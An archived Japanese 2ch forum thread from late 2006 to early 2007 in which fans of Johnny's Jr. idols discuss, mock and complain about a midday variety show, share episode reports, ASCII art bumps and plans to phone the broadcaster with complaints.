もっとKITTYメインにしてよ。

243 :ユーは名無しネ:2006/12/10(日) 20:05:48
>241
半年ロムれ

244 :ユーは名無しネ:2006/12/10(日) 22:39:55
この番組のネタは個人スレに書かれるから過疎化するな

そんなわけでKCネタ

お婆ちゃんに抱っこされた孫(w

245 :ユーは名無しネ:2006/12/11(月) 01:46:28
>240
百織やってんのかよ?

246 :ユーは名無しネ:2006/12/11(月) 06:18:51
×百織
○百識
じゃなくて?

247 :ユーは名無しネ:2006/12/17(日) 12:55:37
( ~д~)太りました

248 :ユーは名無しネ:2006/12/17(日) 13:20:30
今日のどうだったの?レポ待ってますノシ

249 :ユーは名無しネ:2006/12/17(日) 13:41:32
滝野がかなりおいしかった
突然プッシュされたかと思った
今日は珍回答なかったな
EDはキスマイミーマイン

250 :ユーは名無しネ:2006/12/17(日) 14:09:18
今日は苺がチンコ揉んでてあそこがおもしろかった
ブタムの乳首話もまぁまぁ
ズニアは百式より夕立がおいしいね
トークさせてくれるからね

251 :ユーは名無しネ:2006/12/17(日) 14:52:39
>249
EDはブタムひとりで歌ったのか…?

252 :ユーは名無しネ:2006/12/17(日) 15:10:50
足全員

253 :ユーは名無しネ:2006/12/17(日) 17:10:18
>252
dでした

254 :ユーは名無しネ:2006/12/17(日) 22:04:33
ゲスト誰でした!?

255 :ユーは名無しネ:2006/12/17(日) 22:19:15
三船美佳とプロレスの夫婦

256 :ユーは名無しネ:2006/12/17(日) 23:13:19
>>255
こっちは火曜深夜なので、今から楽しみです!
ありがとうございました!

257 :ユーは名無しネ:2006/12/18(月) 01:40:30
256タソ、ここはハイパー禁止だから


今日は仰天人間も料理もなかったしよかったけど
また次回復活するから凹んだ
歌は結構カメラワークよかった
滝野って子がいきなりとりんの変わりに押されてたみたいな
まぁすぐに後ろに逝ったけど

258 :ユーは名無しネ:2006/12/18(月) 11:25:49
押されるズニアは順々に回ってくような
前は京ズやアンダーソンも前に出てたし

259 :ユーは名無しネ:2006/12/19(火) 09:54:27
あげ

260 :ユーは名無しネ:2006/12/19(火) 14:25:59
仰天人間見ると鬱るし河本飯店はイライラする
録画の編集もしずらいから結局ラストの歌とほんの一部以外は削除になりそう

261 :ユーは名無しネ:2006/12/21(木) 16:03:03
山形は今日の深夜放送age

262 :ユーは名無しネ:2006/12/21(木) 16:07:04
つまんねー

263 :ユーは名無しネ:2006/12/21(木) 19:47:56
ゲストいらないけど百識よりはズニア担的にはおもしろいよ
素が見れるし振られたらおいしいし最後歌うし

264 :ユーは名無しネ:2006/12/22(金) 19:27:55
妻欄

265 :ユーは名無しネ:2006/12/22(金) 22:23:54
歌みじかい

266 :ユーは名無しネ:2006/12/22(金) 22:24:52

来い!きええええブイーーーン  Come here



http://sports2.2ch.net/test/read.cgi/entrance2/1165533515/502



267 :ユーは名無しネ:2006/12/22(金) 23:06:28
滝野くんカワユス

268 :ユーは名無しネ:2006/12/24(日) 01:20:12
歌もっと長くしろ

269 :ユーは名無しネ:2006/12/24(日) 02:11:50
緑の担当は出てない

270 :ユーは名無しネ:2006/12/24(日) 02:12:57


271 :ユーは名無しネ:2006/12/24(日) 09:39:30
 ∧_∧
(・∀・∩)age
 (つ ノ
,( ヽノ
し(_)

272 :ユーは名無しネ:2006/12/24(日) 11:14:44
今日は海老氏か?

273 :ユーは名無しネ:2006/12/24(日) 12:28:29
>271
なんかズレてる

274 :ユーは名無しネ:2006/12/24(日) 12:38:31
下品
妻欄
終わって良し

275 :271が来ましたよ:2006/12/24(日) 13:08:36
自分でもオモーた(w

 ∧_∧
(・∀・∩)age
 (つ ノ
,( ヽノ
し(_)


>274
自分は面白いとオモーよ^^自担出てないけど(w今まで自担が鑢番組に
出ていたから最後だけ観ていなかったんだが自担が出ない週に最後まで
観てみたらライブもあってビクーリ(w(ちなみにその日は2週間前)
ズニアの素が見れる番組だとオモー

276 :ユーは名無しネ:2006/12/24(日) 13:11:20
(゚д゚)ポカーン

277 :ユーは名無しネ:2006/12/24(日) 14:00:39
ズレすぎだろ
わざとか?

278 :ユーは名無しネ:2006/12/24(日) 14:01:12
お昼なのにうんことか言うな

訴えてやる

279 :ユーは名無しネ:2006/12/24(日) 14:26:09
うんこ話とか乳話とか来週は揚句にジャニーズにゲップかよ

280 :ユーは名無しネ:2006/12/24(日) 15:01:43
糞番組早く打ち切ってほしい
自担が哀れ

281 :ユーは名無しネ:2006/12/24(日) 15:38:41
よく事務所が許してるなと思うよね
本当につまんないし
後ろに座ってる子達も全然楽しくなさそ
座らせてる時間をダンスのレッスンにでもあててくれと思う

282 :ユーは名無しネ:2006/12/24(日) 16:55:42
>281
禿同
どうしてもというんならダンス上手い子を座らせて欲しい
ダンス上手い子は大抵楽しんでるふりくらい出来る

283 :ユーは名無しネ:2006/12/24(日) 17:48:01
品がないのが耐えられない
最近は早回しで見ている
自担の表情も暗いし

284 :ユーは名無しネ:2006/12/24(日) 19:44:27
自担つまらなそうな顔してた。
だったら12chanの………


285 :名無し:2006/12/24(日) 22:41:47
なんか最近子猫達も田中やハリセンボンにしらけちゃってるよね(笑)


286 :ユーは名無しネ:2006/12/24(日) 23:44:11
クリスマスも終わりヒマなので
「パイ」の答えを何て書いたかまとめてみる

カミュー…タオパイパイ
コロン…グッパイ
毛逝…和香パイ(正解)
京ズ…チョコパイ
伊藤…ホームパイ
高崎…bigパイ
レオ弟・KC…アップルパイ
ビク…デカパイ

287 :ユーは名無しネ:2006/12/25(月) 14:04:05
あれはプラムヲタに対する嫌がらせか?
苦情の電話は局に掛ければいいのか?

288 :名無し:2006/12/25(月) 22:00:05
プラムヲタですが何か

289 :ユーは名無しネ:2006/12/25(月) 23:16:38
プラムヲタあれに気付かなかったのか?

290 :名無し:2006/12/26(火) 00:59:00
ルーレットになかなか当たんないとか?
プラムヲタですが(・ω・`A)

291 :ユーは名無しネ:2006/12/26(火) 08:46:22
ヒント:

  か
  い

292 :名無し:2006/12/26(火) 09:08:53
ビデオ録画しときゃ良かった(汗
困ったな…毎週観てるはずなのにわかんない(-_-;
そういや出前とっちゃいなよコーナーで貝が出た事でそれと関連してるとか?

293 :ユーは名無しネ:2006/12/26(火) 09:33:29
厨には教えねーよ(・∀・)

294 :名無し:2006/12/26(火) 09:41:55
orz…。

295 :ユーは名無しネ:2006/12/26(火) 09:55:36
orz

296 :ユーは名無しネ:2006/12/26(火) 11:26:00
もう終わっていいよ

297 :ユーは名無しネ:2006/12/26(火) 11:30:02
糞番組に出てる自担カワウソ
みんなで電話掛けてやろーよ

298 :ユーは名無しネ:2006/12/26(火) 11:31:42
いの上は・・・

299 :ユーは名無しネ:2006/12/26(火) 11:54:44
>297
自分1回電話して苦情いったよ
お昼の番組なのに気持悪いの映すなって
これからBBSにもかくし電話も入れる予定
あとじゃロにも電話してくる
あれは酷いよ
子供がいるのにバスト測るとか月賦するとかうん子の話とか

300 :ユーは名無しネ:2006/12/26(火) 12:16:24
局に掛けていきなり文句言えばいいの?
あの糞番組アリエナス
プラムもプラム担もカワウソ杉る(つД`゚)゚・

301 :ユーは名無しネ:2006/12/26(火) 12:41:08
自分はBBSに文句書いたよ
あんな下品な糞番組に自担を出すなってね

302 :ユーは名無しネ:2006/12/26(火) 16:44:24
自分も何度かBBSで訴えた
仰天人間見てるの辛い
下品なのと汚いのは止めてお昼時で食事中の人もいるだろうにと
河本飯店もダラダラとツマンネーし料理名なんてどうでもいいよ

303 :ユーは名無しネ:2007/01/01(月) 15:06:53
>>291
解ったw

304 :ユーは名無しネ:2007/01/03(水) 12:44:01
>97禿同(w

305 :ユーは名無しネ:2007/01/07(日) 20:32:27
早く伊野尾が見たい

306 :ユーは名無しネ:2007/01/07(日) 20:36:09
早くプラムが見たい

307 :ユーは名無しネ:2007/01/07(日) 20:56:26
明日BBSにメールするよ
あと電話もする
下品すぎるから仰天から見てない

308 :ユーは名無しネ:2007/01/07(日) 20:58:12
>300
夕立の担当の方いらっしゃいますか?っていって
なんでしょうか?っていうから夕立に関していいたいことがあるんですとかいえばおk

309 :ユーは名無しネ:2007/01/07(日) 21:18:53
30分くらいライブステージでいいよね

310 :ユーは名無しネ:2007/01/08(月) 00:14:49
自担見れるだけでもウラヤマなのに苦情言うなよ
自分の痴呆放送されてナス

311 :ユーは名無しネ:2007/01/08(月) 15:23:01
あんな番組なら出ないほうがマシ
自分録った番組自担出てる所だけ編集したら10分程度だったorz
レギュラーなのにな
内容なんてシマランし見なくても困らないし見ててもからいだけだ

312 :ユーは名無しネ:2007/01/09(火) 12:31:16
>311
おまいの自担はTVに出まくりなんだろうな
少蔵でもなかなかうpにならない自担のYOU達は貴重なんだよ


313 :ユーは名無しネ:2007/01/10(水) 10:26:43
放送されてない地域の人が文句言うなよとか言ってもなあ
見てみないとあの不愉快さはワカラナス

314 :ユーは名無しネ:2007/01/11(木) 11:31:53
>313
帝都の知り合いにムリヤリ頼み込んでまるっと焼いて貰っている
もちろんタダではナス


315 :ユーは名無しネ:2007/01/11(木) 11:34:13
番組スタート時は楽しんでるように見えた自担が、今は引き気味に見える
仰天人間とか河本飯店の部分にライブステージが入ればなぁ

316 :ユーは名無しネ:2007/01/11(木) 22:59:36
YMGT放送age

317 :ユーは名無しネ:2007/01/14(日) 11:27:26
マジレスすると今の時代バラエティーで通用しなきゃジャニだって視聴率とれない。アメニモ潰してまで取った番組だから必死なんだろうよ

318 :ユーは名無しネ:2007/01/14(日) 23:11:31
むりすんな

319 :ユーは名無しネ:2007/01/23(火) 22:33:58
この番組つまんない
早く終わればいいのにね


320 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/28(日) 13:20:21
よかったし楽しかったね!
てなコトでage

321 :ユーは名無しネ:2007/01/28(日) 13:30:30
虫R発言

322 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/28(日) 14:10:15
>321
どの辺?やけにカトカンが目立っちゃってて…(笑
いちいち反応するあたしワロ好(笑笑笑

323 :ユーは名無しネ:2007/01/28(日) 18:47:05
今日もつまんなかったな〜
せっかくズニア出てる番組なのになんでこんなに面白く無いんだー

324 :ユーは名無しネ:2007/01/28(日) 20:43:53
八乙女がいかにもつまらなそうにしてるのは笑える
針千本が体張ったギャグしてもウザそうにしてる。

325 :ユーは名無しネ:2007/01/28(日) 20:49:02
そんな事ないよ!
みんな笑ってたよ…たぶん。

326 :ユーは名無しネ:2007/01/28(日) 21:02:19
それをいうなら苦笑だろ(w

327 :ユーは名無しネ:2007/01/28(日) 22:02:30
ライブステージが短すぎる上に
エンドロールと一緒になるから不快
もっと長くやれよ

328 :ユーは名無しネ:2007/01/28(日) 22:15:19
ほっしゃんの鼻うどんは虫栗大喜び

329 :ユーは名無しネ:2007/01/28(日) 22:46:34
知らないズニアも増えてきた

神田憲征
山口海
ペイン・ダンテ・将之介
伊藤拓美
ルイス・ジェシー
山倉沙瑠芙
森本慎太郎
久道雅人
加藤冠
滝野雄
稲見友剛
アンダーソン・ケイシー

330 :ユーは名無しネ:2007/01/28(日) 22:48:01
伊藤拓美
森本慎太郎
加藤冠
あたりはもうずいぶん(jrとしては)知名度はあると思うが。

331 :ユーは名無しネ:2007/01/29(月) 00:13:33
神田憲征
伊藤拓美
森本慎太郎
加藤冠
滝野雄
アンダーソン・ケイシー

は知ってる人結構いると思う

332 :ユーは名無しネ:2007/01/29(月) 02:25:34
>>329
どんだけ知らないんだよw
伊野尾ちゃんが爆笑してるの見てキュンとした。

333 :ユーは名無しネ:2007/01/29(月) 02:28:31
2ネムコードまもってね

334 :ユーは名無しネ:2007/01/29(月) 03:58:42
レオ栗もう出ないのかな

335 :ユーは名無しネ:2007/01/29(月) 09:33:17
打ち切りだろ

336 :ユーは名無しネ:2007/01/30(火) 16:11:19
ズニアメインにしたいのかお笑いメインにしたいのか不明だな

337 :ユーは名無しネ:2007/02/02(金) 12:30:32
カトカンいらね
毛逝キャワ

338 :ユーは名無しネ:2007/02/11(日) 21:06:45
毛逝キャワすぎだろwww
やべえ

339 :ユーは名無しネ:2007/02/11(日) 21:29:37
伊野尾かっこよかった!
光はつまんなさそうにしてるのいいよね


340 :ユーは名無しネ:2007/02/12(月) 02:06:17
割込スマソ
番協ってあるの?

341 :ユーは名無しネ:2007/02/12(月) 13:59:20
あぷろーず


このエキストラ会社に登録しろ

土曜日収録

342 :ユーは名無しネ:2007/02/12(月) 14:51:37
打ち切りなのか!?

343 :ユーは名無しネ:2007/02/12(月) 18:53:04
カツンの不細工二人が必死すぎてきもい

344 :ララにゃん:2007/02/18(日) 10:19:18
漏れら極悪非道の
ageブラザーズ!
今日もネタがあるからこそ
ageてやるからな!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 age   age
   age
  ∧_∧ ∧_∧
 (・∀・∩)(∩・∀・)
 (つ  ノ (  ⊂)
  ( ヽノ ヽ/ )
  し(_)  (_)J

345 :ユーは名無しネ:2007/02/18(日) 11:52:55
山田涼介は出てる?!

外出で観られない(゚д゚)

346 :ユーは名無しネ:2007/02/18(日) 11:56:38
でてないよ

347 :ユーは名無しネ:2007/02/18(日) 12:31:57
今日もつまらん
最後の歌もズニア曲じゃないし

348 :ユーは名無しネ:2007/02/18(日) 12:37:13
苺がいなかった

349 :ユーは名無しネ:2007/02/18(日) 12:42:18
来週予告で裸になってたのはカトカンか?

350 :ユーは名無しネ:2007/02/18(日) 13:05:52
ありがとうございます。

まじですか(--;)

最近でてくれないな...



351 :ユーは名無しネ:2007/02/18(日) 20:37:02
芸能人の秘蔵映像キタ━━━━━━(゚∀゚)━━━━━━

http://tv9.2ch.net/test/read.cgi/actor/1170878857/54

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)